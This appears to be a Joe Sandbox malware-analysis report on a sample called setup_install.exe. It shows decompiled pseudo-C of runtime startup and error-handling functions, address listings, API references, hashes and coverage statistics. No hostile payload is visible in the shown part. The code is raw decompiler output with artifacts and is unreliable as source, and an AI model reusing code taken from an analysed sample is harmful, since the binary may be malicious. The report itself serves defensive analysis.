				 *((intOrPtr*)(__ecx + 0xc8)) =  *((intOrPtr*)(__ecx + 0xc0)) -  *((intOrPtr*)(_t190 + 0xc));
				 *((intOrPtr*)(__ecx + 0xcc)) =  *((intOrPtr*)(__ecx + 0xc4));
				E00409944(__ecx + 0x10);
				 *(_t190 - 0x24) = 0;
				 *((short*)(_t190 - 0x22)) = 0;
				 *(_t190 - 0x1c) = 0;
				_t110 =  *((intOrPtr*)(_t190 + 8));
				 *(_t190 - 4) = 0;
				_t111 =  *((intOrPtr*)( *_t110 + 0x20))(_t110, 0x47, _t190 - 0x24, _t181, _t187, _t138);
				 *(_t190 - 0x10) = _t111;
				if(_t111 == 0) {
					 *((intOrPtr*)(__ecx + 0x14)) = E00409903(_t190 - 0x24, __ecx + 0x13);
					E00405DEF(_t190 - 0x24);
					 *(_t190 - 0x24) = 0;
					 *((short*)(_t190 - 0x22)) = 0;
					 *(_t190 - 0x1c) = 0;
					_t114 =  *((intOrPtr*)(_t190 + 8));
					 *(_t190 - 4) = 1;
					_t115 =  *((intOrPtr*)( *_t114 + 0x20))(_t114, 0x48, _t190 - 0x24);
					__eflags = _t115;
					 *(_t190 - 0x10) = _t115;
					if(_t115 == 0) {
						 *((intOrPtr*)(__ecx + 0x18)) = E00409903(_t190 - 0x24, 0);
						E00405DEF(_t190 - 0x24);
						 *(_t190 - 0x24) = 0;
						 *((short*)(_t190 - 0x22)) = 0;
						 *(_t190 - 0x1c) = 0;
						_t118 =  *((intOrPtr*)(_t190 + 8));
						 *(_t190 - 4) = 2;
						_t119 =  *((intOrPtr*)( *_t118 + 0x20))(_t118, 0x37, _t190 - 0x24);
						__eflags = _t119;
						 *(_t190 - 0x10) = _t119;
						if(_t119 == 0) {
							__eflags =  *(_t190 - 0x24);
							if( *(_t190 - 0x24) != 0) {
								__eflags =  *(_t190 - 0x24) - 8;
								_t133 =  *(_t190 - 0x1c);
								if( *(_t190 - 0x24) != 8) {
									_t133 = L"Unknown error";
								}
								E0040376E(_t188 + 0x28, _t133);
							}
							E00405DEF(_t190 - 0x24);
							 *(_t190 - 0x24) = 0;
							 *((short*)(_t190 - 0x22)) = 0;
							 *(_t190 - 0x1c) = 0;
							_t121 =  *((intOrPtr*)(_t190 + 8));
							 *(_t190 - 4) = 3;
							_t122 =  *((intOrPtr*)( *_t121 + 0x20))(_t121, 0x49, _t190 - 0x24);
							__eflags = _t122;
							 *(_t190 - 0x10) = _t122;
							if(_t122 == 0) {
								__eflags =  *(_t190 - 0x24);
								if( *(_t190 - 0x24) != 0) {
									__eflags =  *(_t190 - 0x24) - 8;
									_t130 =  *(_t190 - 0x1c);
									if( *(_t190 - 0x24) != 8) {
										_t130 = L"Unknown warning";
									}
									E0040376E(_t188 + 0x34, _t130);
								}
								 *(_t190 - 4) =  *(_t190 - 4) | 0xffffffff;
								E00405DEF(_t190 - 0x24);
								__eflags =  *(_t190 + 0x14);
								if( *(_t190 + 0x14) == 0) {
									L19:
									_push(_t188 + 0xb8);
									_push(_t188 + 0xb0);
									_t175 = 0x2c;
									_t126 = E00409C0D( *((intOrPtr*)(_t190 + 8)), _t175);
									__eflags = _t126;
									if(_t126 == 0) {
										_push(_t190 + 0x17);
										_push(_t182);
										_t176 = 0x24;
										_t126 = E00409CAB( *((intOrPtr*)(_t190 + 8)), _t176);
										__eflags = _t126;
										if(_t126 == 0) {
											asm("adc eax, [edi+0x4]");
											 *((intOrPtr*)(_t190 + 0xc)) =  *((intOrPtr*)(_t190 + 0xc)) +  *_t182;
											_t161 =  *((intOrPtr*)(_t188 + 0xc0));
											_t129 =  *(_t188 + 0xc4);
											asm("sbb edi, [ebp+0x10]");
											__eflags =  *(_t188 + 0xb8);
											 *((intOrPtr*)(_t188 + 0xc8)) = _t161 -  *((intOrPtr*)(_t190 + 0xc));
											 *(_t188 + 0xcc) = _t129;
											if( *(_t188 + 0xb8) != 0) {
												_t141 =  *((intOrPtr*)(_t188 + 0xb0));
												_t180 =  *(_t188 + 0xb4);
												_t186 = _t141 +  *((intOrPtr*)(_t190 + 0xc));
												 *(_t190 - 0x10) = _t180;
												asm("adc edx, [ebp+0x10]");
												__eflags = _t180 - _t129;
												if(__eflags > 0) {
													L29:
													 *((char*)(_t188 + 0x11)) = 1;
												} else {
													if(__eflags < 0) {
														L25:
														 *((intOrPtr*)(_t188 + 0xc8)) = _t141;
														 *((intOrPtr*)(_t188 + 0x20)) = _t161 - _t186;
														asm("sbb eax, edx");
														 *(_t188 + 0xcc) =  *(_t190 - 0x10);
														 *((char*)(_t188 + 0x10)) = 1;
														 *(_t188 + 0x24) = _t129;
													} else {
														__eflags = _t186 - _t161;
														if(_t186 >= _t161) {
															__eflags = _t180 - _t129;
															if(__eflags >= 0) {
																if(__eflags > 0) {
																	goto L29;
																} else {
																	__eflags = _t186 - _t161;
																	if(_t186 > _t161) {
																		goto L29;
																	}
																}
															}
														} else {
															goto L25;
														}
													}
												}
											}
											goto L30;
										}
									}
								} else {
									__eflags =  *(_t188 + 0x13);
									if( *(_t188 + 0x13) == 0) {
										L30:
										_t126 = 0;
										__eflags = 0;
									} else {
										__eflags =  *(_t188 + 0x14) & 0x00000001;
										if(( *(_t188 + 0x14) & 0x00000001) != 0) {
											goto L30;
										} else {
											goto L19;
										}
									}
								}
							} else {
								E00405DEF(_t190 - 0x24);
								_t126 =  *(_t190 - 0x10);
							}
						} else {
							E00405DEF(_t190 - 0x24);
							_t126 =  *(_t190 - 0x10);
						}
					} else {
						E00405DEF(_t190 - 0x24);
						_t126 =  *(_t190 - 0x10);
					}
				} else {
					E00405DEF(_t190 - 0x24);
					_t126 =  *(_t190 - 0x10);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t190 - 0xc));
				return _t126;
			}

0x00409975
0x0040997f
0x00409984
0x00409990
0x00409996
0x0040999c
0x0040999e
0x004099a7
0x004099ac
0x004099af
0x004099b2
0x004099b8
0x004099c1
0x004099c6
0x004099ca
0x004099ce
0x004099d1
0x004099dd
0x004099e0
0x004099e5
0x004099e8
0x00409a08
0x00409a0b
0x00409a10
0x00409a14
0x00409a18
0x00409a1b
0x00409a27
0x00409a2e
0x00409a31
0x00409a33
0x00409a36
0x00409a55
0x00409a58
0x00409a5d
0x00409a61
0x00409a65
0x00409a68
0x00409a74
0x00409a7b
0x00409a7e
0x00409a80
0x00409a83
0x00409a95
0x00409a99
0x00409a9b
0x00409aa0
0x00409aa3
0x00409aa5
0x00409aa5
0x00409aae
0x00409aae
0x00409ab6
0x00409abb
0x00409abf
0x00409ac3
0x00409ac6
0x00409ad2
0x00409ad9
0x00409adc
0x00409ade
0x00409ae1
0x00409af3
0x00409af7
0x00409af9
0x00409afe
0x00409b01
0x00409b03
0x00409b03
0x00409b0c
0x00409b0c
0x00409b11
0x00409b18
0x00409b1d
0x00409b20
0x00409b35
0x00409b3e
0x00409b45
0x00409b48
0x00409b49
0x00409b4e
0x00409b50
0x00409b5c
0x00409b5d
0x00409b60
0x00409b61
0x00409b66
0x00409b68
0x00409b76
0x00409b79
0x00409b7c
0x00409b85
0x00409b92
0x00409b95
0x00409b9b
0x00409ba1
0x00409ba7
0x00409ba9
0x00409bb7
0x00409bba
0x00409bbd
0x00409bc0
0x00409bc3
0x00409bc5
0x00409bf6
0x00409bf6
0x00409bc7
0x00409bc7
0x00409bcd
0x00409bcf
0x00409bd8
0x00409bdb
0x00409bdd
0x00409be3
0x00409be7
0x00409bc9
0x00409bc9
0x00409bcb
0x00409bec
0x00409bee
0x00409bf0
0x00000000
0x00409bf2
0x00409bf2
0x00409bf4
0x00000000
0x00000000
0x00409bf4
0x00409bf0
0x00000000
0x00000000
0x00000000
0x00409bcb
0x00409bc7
0x00409bc5
0x00000000
0x00409ba7
0x00409b68
0x00409b22
0x00409b22
0x00409b25
0x00409bfa
0x00409bfa
0x00409bfa
0x00409b2b
0x00409b2b
0x00409b2f
0x00000000
0x00000000
0x00000000
0x00000000
0x00409b2f
0x00409b25
0x00409ae3
0x00409ae6
0x00409aeb
0x00409aeb
0x00409a85
0x00409a88
0x00409a8d
0x00409a8d
0x00409a38
0x00409a3b
0x00409a40
0x00409a40
0x004099ea
0x004099ed
0x004099f2
0x004099f2
0x00409c02
0x00409c0a

APIs

__EH_prolog.LIBCMT ref: 00409975

Strings

Unknown warning, xrefs: 00409B03, 00409B08
Unknown error, xrefs: 00409AA5, 00409AAA

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID: Unknown error$Unknown warning
API String ID: 3519838083-4291957651
Opcode ID: 9dde15fecc67fda54480402201b2371ac7cafa8d569a837fbeba078dd26f7487
Instruction ID: 8ba015e8ed9162120bf5fc528179e89f7f943c1107267e4dc13521d9f15a9599
Opcode Fuzzy Hash: 9dde15fecc67fda54480402201b2371ac7cafa8d569a837fbeba078dd26f7487
Instruction Fuzzy Hash: DB915B71900209DBCB24DFA9C990AEEB7F1FF48304F10856EE45AA7291D734AE49CB58

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: setup_install.exe PID: 5976 Parent PID: 7156 setup_install.exeCOMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.9%
Total number of Nodes:	244
Total number of Limit Nodes:	3

Executed Functions

Function 0040115C, Relevance: 19.7, APIs: 13, Instructions: 199
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 004011A2
SetUnhandledExceptionFilter.KERNEL32 ref: 00401223
__p__acmdln.MSVCRT ref: 0040124C
malloc.MSVCRT ref: 004012E2
strlen.MSVCRT ref: 0040131B
malloc.MSVCRT ref: 00401326
memcpy.MSVCRT ref: 0040133C
GetStartupInfoA.KERNEL32 ref: 00401433

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 041da77b3599d4e2928a5f692de7c3a45124fbc6f867a1be88378086ecd05ce7
Instruction ID: 00bbe98ddcf967de8497b3507955f42588d54d7dd302ccf13e9a4cb62a00ed3d
Opcode Fuzzy Hash: 041da77b3599d4e2928a5f692de7c3a45124fbc6f867a1be88378086ecd05ce7
Instruction Fuzzy Hash: CA81AB70904394CFDB10DF69D8C176A7BE1FB54358F02853EE944AB3A2D7799848CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004013C9, Relevance: 13.6, APIs: 9, Instructions: 113
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E004013C9(char** _a4, signed int _a8) {
				signed int _v0;
				void* _v16;
				signed short _v44;
				signed char _v48;
				void* _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				long _t42;
				_Unknown_base(*)()* _t44;
				signed char** _t46;
				signed char* _t47;
				void* _t48;
				intOrPtr* _t49;
				intOrPtr* _t52;
				intOrPtr _t53;
				char** _t54;
				signed int _t55;
				int _t56;
				intOrPtr _t58;
				char* _t60;
				void* _t62;
				signed int _t65;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				void* _t73;
				char*** _t77;
				signed int _t80;
				intOrPtr _t81;
				void* _t85;
				signed int _t86;
				signed int _t87;
				char** _t88;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t91;
				char** _t95;
				int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				void** _t105;
				intOrPtr* _t106;

				while(1) {
					L39:
					_t39 =  *0x4e6ed4; // 0x2
					_t70 = 1;
					if(_t39 != 1) {
						goto L8;
					}
					L40:
					 *_t105 = 0x1f;
					L0041B5D8();
					_t66 =  *0x4e6ed4; // 0x2
					if(_t66 != 1) {
						L11:
						if(_t70 == 0) {
							goto L42;
						}
						goto L12;
					} else {
						L41:
						_a4 = 0x4e8008;
						_v0 = 0x4e8000;
						L0041B5A0();
						 *0x4e6ed4 = 2;
						if(_t70 != 0) {
							L12:
							_t42 =  *0x4a4894; // 0x40c270
							if(_t42 != 0) {
								_a8 = 0;
								_a4 = 2;
								_v0 = 0;
								_t42 =  *_t42();
								_t105 = _t105 - 0xc;
							}
							E0040C570(_t42, _t91, _t98);
							_v0 = 0x40c7f0; // executed
							_t44 = SetUnhandledExceptionFilter(??); // executed
							_t106 = _t105 - 4;
							 *0x4e64ac = _t44;
							 *_t106 = 0x401000;
							_t46 = E0040C3F0(E0041B640());
							 *0x4e6ec8 = 0x400000;
							L0041B5F8();
							_t47 =  *_t46;
							_t80 = 0;
							if(_t47 != 0) {
								while(1) {
									_t86 =  *_t47 & 0x000000ff;
									if(_t86 <= 0x20) {
										goto L16;
									}
									L21:
									_t80 =  ==  ? _t80 ^ 0x00000001 : _t80;
									L19:
									_t47 =  &(_t47[1]);
									_t86 =  *_t47 & 0x000000ff;
									if(_t86 <= 0x20) {
										goto L16;
									}
									L26:
									 *0x4e6ecc = _t47;
									goto L27;
									L16:
									if(_t86 != 0 && (_t80 & 0x00000001) != 0) {
										_t80 = 1;
										goto L19;
									}
									if(_t86 != 0) {
										while(1) {
											_t47 =  &(_t47[1]);
											_t87 =  *_t47 & 0x000000ff;
											if(_t87 == 0) {
												goto L26;
											}
											if(_t87 <= 0x20) {
												continue;
											}
											goto L26;
										}
									} else {
									}
									goto L26;
								}
							} else {
							}
							L27:
							_t71 =  *0x4e6498; // 0x0
							if(_t71 != 0) {
								_t65 = 0xa;
								if((_v48 & 0x00000001) != 0) {
									_t65 = _v44 & 0x0000ffff;
								}
								 *0x49f000 = _t65;
							}
							_t68 =  *0x4e6018; // 0x1
							_t96 = 4 + _t68 * 4;
							_t48 = malloc(_t96);
							_v112 = _t48;
							_t88 =  *0x4e6014; // 0xac04c8
							if(_t68 <= 0) {
								_t49 = _v112;
							} else {
								_t73 = _t48;
								_t14 = _t96 - 4; // 0x74e0648c
								_t58 = _t14;
								_t95 = _t88;
								_v116 = _t58;
								_v108 = _t58 + _t88;
								do {
									_t60 =  *_t95;
									_t73 = _t73 + 4;
									_t95 =  &(_t95[1]);
									_t17 = strlen(_t60) + 1; // 0x1
									_t96 = _t17;
									_t62 = malloc(_t96);
									 *(_t73 - 4) = _t62;
									memcpy(_t62,  *(_t95 - 4), _t96);
								} while (_v108 != _t95);
								_t49 = _v116 + _v112;
							}
							 *_t49 = 0;
							 *0x4e6014 = _v112;
							E0040C0A0();
							_t52 =  *0x4e7360; // 0x74d3608c
							_t89 =  *0x4e6010; // 0xac15c8
							 *_t52 = _t89;
							_t53 =  *0x4e6010; // 0xac15c8
							_a8 = _t53;
							_t54 =  *0x4e6014; // 0xac04c8
							_a4 = _t54;
							_t55 =  *0x4e6018; // 0x1
							_v0 = _t55; // executed
							_t56 = E0040165F();
							_t81 =  *0x4e6008; // 0x0
							 *0x4e600c = _t56;
							if(_t81 == 0) {
								exit(_t56); // executed
								 *0x4e6498 = 1;
								E0040C0E0();
								_t102 = _t106 - 0xc + 0xc;
								_t77 =  &_a4;
								_t103 = _t102 & 0xfffffff0;
								_push( *((intOrPtr*)(_t77 - 4)));
								_push(_t100);
								_t100 = _t103;
								_push(_t91);
								_push(_t96);
								_push(_t68);
								_push(_t77);
								_t85 = _t100 - 0x5c;
								_t97 =  *0x4e6498; // 0x0
								memset(_t85, 0, 0x11 << 2);
								_t105 = _t103 - 0x78 + 0xc;
								if(_t97 != 0) {
									 *_t105 = _t85;
									GetStartupInfoA(??);
									_t105 = _t105 - 4;
								}
								_t91 =  *((intOrPtr*)( *[fs:0x18] + 4));
								_t98 =  *0x4e7334;
								while(1) {
									asm("lock cmpxchg [0x4e6ed8], edi");
									if(0 == 0) {
										break;
									}
									if(_t91 == 0) {
										goto L39;
									} else {
										 *_t105 = 0x3e8;
										Sleep(??);
										_t105 = _t105 - 4;
										continue;
									}
									goto L12;
								}
								_t67 =  *0x4e6ed4; // 0x2
								_t70 = 0;
								if(_t67 == 1) {
									goto L40;
								} else {
									goto L8;
								}
								goto L12;
							}
							_t90 =  *0x4e6004; // 0x0
							if(_t90 == 0) {
								L0041B5D0();
								_t56 =  *0x4e600c; // 0x0
							}
						} else {
							L42:
							 *0x4e6ed8 = _t70;
							goto L12;
						}
					}
					return _t56;
					L8:
					_t40 =  *0x4e6ed4; // 0x2
					if(_t40 == 0) {
						_a4 = 0x4e8018;
						_v0 = 0x4e800c;
						 *0x4e6ed4 = 1;
						L0041B5A0();
					} else {
						 *0x4e6004 = 1;
					}
					_t41 =  *0x4e6ed4; // 0x2
					if(_t41 == 1) {
						goto L41;
					} else {
						goto L11;
					}
					goto L12;
				}
			}

0x004013d0
0x004013d0
0x004013d0
0x004013d5
0x004013dd
0x00000000
0x00000000
0x004013e3
0x004013e3
0x004013ea
0x004013ef
0x004013f7
0x004011ea
0x004011ec
0x00000000
0x00000000
0x00000000
0x004013fd
0x004013fd
0x004013fd
0x00401405
0x0040140c
0x00401413
0x0040141d
0x004011f2
0x004011f2
0x004011f9
0x004011fb
0x00401203
0x0040120b
0x00401212
0x00401214
0x00401214
0x00401217
0x0040121c
0x00401223
0x00401229
0x0040122c
0x00401231
0x0040123d
0x00401242
0x0040124c
0x00401251
0x00401253
0x00401257
0x00401271
0x00401271
0x00401277
0x00000000
0x00000000
0x00401279
0x00401281
0x0040126e
0x0040126e
0x00401271
0x00401277
0x00000000
0x00000000
0x004012af
0x004012af
0x00000000
0x00401260
0x00401262
0x00401269
0x00000000
0x00401269
0x00401292
0x004012a5
0x004012a5
0x004012a8
0x004012ad
0x00000000
0x00000000
0x004012a3
0x00000000
0x00000000
0x00000000
0x004012a3
0x00000000
0x00401294
0x00000000
0x00401292
0x00000000
0x00401259
0x004012b4
0x004012b4
0x004012bc
0x004012c2
0x004012c7
0x004013c0
0x004013c0
0x004012cd
0x004012cd
0x004012d2
0x004012d8
0x004012e2
0x004012e9
0x004012ec
0x004012f2
0x00401464
0x004012f8
0x004012f8
0x004012fa
0x004012fa
0x004012fd
0x004012ff
0x00401304
0x00401310
0x00401310
0x00401312
0x00401315
0x00401320
0x00401320
0x00401326
0x0040132b
0x0040133c
0x00401341
0x00401349
0x00401349
0x0040134c
0x00401355
0x0040135a
0x0040135f
0x00401364
0x0040136a
0x0040136c
0x00401371
0x00401375
0x0040137a
0x0040137e
0x00401383
0x00401386
0x0040138b
0x00401391
0x00401398
0x0040146f
0x00401483
0x0040148d
0x00401492
0x00401150
0x00401154
0x00401159
0x0040115c
0x0040115d
0x0040115f
0x00401160
0x00401161
0x00401162
0x00401163
0x0040116e
0x00401176
0x00401176
0x0040117a
0x00401430
0x00401433
0x00401439
0x00401439
0x00401188
0x0040118b
0x004011a7
0x004011a9
0x004011b3
0x00000000
0x00000000
0x00401195
0x00000000
0x0040119b
0x0040119b
0x004011a2
0x004011a4
0x00000000
0x004011a4
0x00000000
0x00401195
0x004011b5
0x004011ba
0x004011bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004011bf
0x0040139e
0x004013a6
0x004013a8
0x004013ad
0x004013ad
0x00401423
0x00401423
0x00401423
0x00000000
0x00401423
0x0040141d
0x004013bd
0x004011c5
0x004011c5
0x004011cc
0x00401441
0x00401449
0x00401450
0x0040145a
0x004011d2
0x004011d2
0x004011d2
0x004011dc
0x004011e4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004011e4

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00401223
__p__acmdln.MSVCRT ref: 0040124C
malloc.MSVCRT ref: 004012E2
strlen.MSVCRT ref: 0040131B
malloc.MSVCRT ref: 00401326
memcpy.MSVCRT ref: 0040133C
_cexit.MSVCRT ref: 004013A8
_amsg_exit.MSVCRT ref: 004013EA
_initterm.MSVCRT ref: 0040140C

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 738594520-0
Opcode ID: f8ff394b5cca8fbee39b1296a5fd250276d040acdef678c227af5fbfdf905530
Instruction ID: 75b0b1c9969982f25d124ac38820227e5dae3d21a58fd84a16dba1780b61fc02
Opcode Fuzzy Hash: f8ff394b5cca8fbee39b1296a5fd250276d040acdef678c227af5fbfdf905530
Instruction Fuzzy Hash: BA413774A04350CBDB10EF69D9C065AB7E0FB58358F11853ED988AB3A2D7789844CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401150, Relevance: 10.6, APIs: 7, Instructions: 135
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00401150(char _a4) {
				void* _v20;
				signed short _v48;
				signed char _v52;
				char _v100;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				signed int _v136;
				char** _v140;
				signed int _v144;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				long _t42;
				_Unknown_base(*)()* _t44;
				signed char** _t46;
				signed char* _t47;
				void* _t48;
				intOrPtr* _t49;
				intOrPtr* _t52;
				intOrPtr _t53;
				char** _t54;
				signed int _t55;
				int _t56;
				intOrPtr _t58;
				char* _t60;
				void* _t62;
				signed int _t65;
				signed int _t66;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				void* _t74;
				char* _t78;
				signed int _t81;
				intOrPtr _t82;
				struct _STARTUPINFOA* _t86;
				signed int _t87;
				signed int _t88;
				char** _t89;
				intOrPtr _t90;
				signed int _t91;
				intOrPtr _t95;
				char** _t97;
				signed int _t99;
				intOrPtr _t100;
				int _t101;
				int _t103;
				signed int _t107;
				signed int _t108;
				void* _t110;

				L0:
				while(1) {
					L0:
					_t78 =  &_a4;
					_t108 = _t107 & 0xfffffff0;
					_push( *((intOrPtr*)(_t78 - 4)));
					_push(_t78);
					_t86 =  &_v100;
					_t99 =  *0x4e6498; // 0x0
					memset(_t86, 0, 0x11 << 2);
					_t110 = _t108 - 0x78 + 0xc;
					if(_t99 != 0) {
						GetStartupInfoA(_t86);
						_t110 = _t110 - 4;
					}
					_t95 =  *((intOrPtr*)( *[fs:0x18] + 4));
					_t100 =  *0x4e7334;
					while(1) {
						L5:
						asm("lock cmpxchg [0x4e6ed8], edi");
						if(0 == 0) {
							break;
						}
						L3:
						if(_t95 == 0) {
							L38:
							_t39 =  *0x4e6ed4; // 0x2
							_t70 = 1;
							if(_t39 != 1) {
								L7:
								_t40 =  *0x4e6ed4; // 0x2
								if(_t40 == 0) {
									_v140 = 0x4e8018;
									_v144 = 0x4e800c;
									 *0x4e6ed4 = 1;
									L0041B5A0();
								} else {
									 *0x4e6004 = 1;
								}
								_t41 =  *0x4e6ed4; // 0x2
								if(_t41 == 1) {
									goto L40;
								} else {
									goto L10;
								}
							} else {
								L39:
								_v144 = 0x1f;
								L0041B5D8();
								_t66 =  *0x4e6ed4; // 0x2
								if(_t66 != 1) {
									L10:
									if(_t70 == 0) {
										goto L41;
									}
								} else {
									L40:
									_v140 = 0x4e8008;
									_v144 = 0x4e8000;
									L0041B5A0();
									 *0x4e6ed4 = 2;
									if(_t70 == 0) {
										L41:
										 *0x4e6ed8 = _t70;
									}
								}
							}
							goto L11;
							L36:
							return _t56;
							L46:
						} else {
							L4:
							Sleep(0x3e8);
							_t110 = _t110 - 4;
							continue;
						}
						L11:
						_t42 =  *0x4a4894; // 0x40c270
						if(_t42 != 0) {
							_v136 = 0;
							_v140 = 2;
							_v144 = 0;
							_t42 =  *_t42();
							_t110 = _t110 - 0xc;
						}
						E0040C570(_t42, _t95, _t100);
						_v144 = 0x40c7f0; // executed
						_t44 = SetUnhandledExceptionFilter(??); // executed
						 *0x4e64ac = _t44;
						 *((intOrPtr*)(_t110 - 4)) = 0x401000;
						_t46 = E0040C3F0(E0041B640());
						 *0x4e6ec8 = 0x400000;
						L0041B5F8();
						_t47 =  *_t46;
						_t81 = 0;
						if(_t47 != 0) {
							while(1) {
								L19:
								_t87 =  *_t47 & 0x000000ff;
								if(_t87 <= 0x20) {
									goto L15;
								}
								L20:
								_t81 =  ==  ? _t81 ^ 0x00000001 : _t81;
								L18:
								_t47 =  &(_t47[1]);
								L19:
								_t87 =  *_t47 & 0x000000ff;
								if(_t87 <= 0x20) {
									goto L15;
								}
								L25:
								 *0x4e6ecc = _t47;
								goto L26;
								L15:
								if(_t87 != 0 && (_t81 & 0x00000001) != 0) {
									L17:
									_t81 = 1;
									goto L18;
								}
								L21:
								if(_t87 != 0) {
									while(1) {
										L24:
										_t47 =  &(_t47[1]);
										_t88 =  *_t47 & 0x000000ff;
										if(_t88 == 0) {
											goto L25;
										}
										L23:
										if(_t88 <= 0x20) {
											continue;
										}
										goto L25;
									}
								}
								goto L25;
							}
						}
						L26:
						_t71 =  *0x4e6498; // 0x0
						if(_t71 != 0) {
							_t65 = 0xa;
							if((_v52 & 0x00000001) != 0) {
								_t65 = _v48 & 0x0000ffff;
							}
							 *0x49f000 = _t65;
						}
						_t72 =  *0x4e6018; // 0x1
						_t101 = 4 + _t72 * 4;
						_t48 = malloc(_t101);
						_v116 = _t48;
						_t89 =  *0x4e6014; // 0xac04c8
						if(_t72 <= 0) {
							L44:
							_t49 = _v116;
						} else {
							L30:
							_t74 = _t48;
							_t14 = _t101 - 4; // 0x74e0648c
							_t58 = _t14;
							_t97 = _t89;
							_v120 = _t58;
							_v112 = _t58 + _t89;
							do {
								L31:
								_t60 =  *_t97;
								_t74 = _t74 + 4;
								_t97 =  &(_t97[1]);
								_t17 = strlen(_t60) + 1; // 0x1
								_t103 = _t17;
								_t62 = malloc(_t103);
								 *(_t74 - 4) = _t62;
								memcpy(_t62,  *(_t97 - 4), _t103);
							} while (_v112 != _t97);
							_t49 = _v120 + _v116;
						}
						L33:
						 *_t49 = 0;
						 *0x4e6014 = _v116;
						E0040C0A0();
						_t52 =  *0x4e7360; // 0x74d3608c
						_t90 =  *0x4e6010; // 0xac15c8
						 *_t52 = _t90;
						_t53 =  *0x4e6010; // 0xac15c8
						_v136 = _t53;
						_t54 =  *0x4e6014; // 0xac04c8
						_v140 = _t54;
						_t55 =  *0x4e6018; // 0x1
						_v144 = _t55; // executed
						_t56 = E0040165F();
						_t82 =  *0x4e6008; // 0x0
						 *0x4e600c = _t56;
						if(_t82 == 0) {
							L45:
							exit(_t56); // executed
							 *0x4e6498 = 1;
							E0040C0E0();
							goto L0;
						}
						L34:
						_t91 =  *0x4e6004; // 0x0
						if(_t91 == 0) {
							L0041B5D0();
							_t56 =  *0x4e600c; // 0x0
						}
						goto L36;
					}
					L6:
					_t67 =  *0x4e6ed4; // 0x2
					_t70 = 0;
					if(_t67 == 1) {
						goto L39;
					} else {
						goto L7;
					}
					goto L11;
				}
			}

0x00401150
0x00401150
0x00401150
0x00401150
0x00401154
0x00401159
0x00401162
0x00401163
0x0040116e
0x00401176
0x00401176
0x0040117a
0x00401433
0x00401439
0x00401439
0x00401188
0x0040118b
0x004011a7
0x004011a7
0x004011a9
0x004011b3
0x00000000
0x00000000
0x00401193
0x00401195
0x004013d0
0x004013d0
0x004013d5
0x004013dd
0x004011c5
0x004011c5
0x004011cc
0x00401441
0x00401449
0x00401450
0x0040145a
0x004011d2
0x004011d2
0x004011d2
0x004011dc
0x004011e4
0x00000000
0x00000000
0x00000000
0x00000000
0x004013e3
0x004013e3
0x004013e3
0x004013ea
0x004013ef
0x004013f7
0x004011ea
0x004011ec
0x00000000
0x00000000
0x004013fd
0x004013fd
0x004013fd
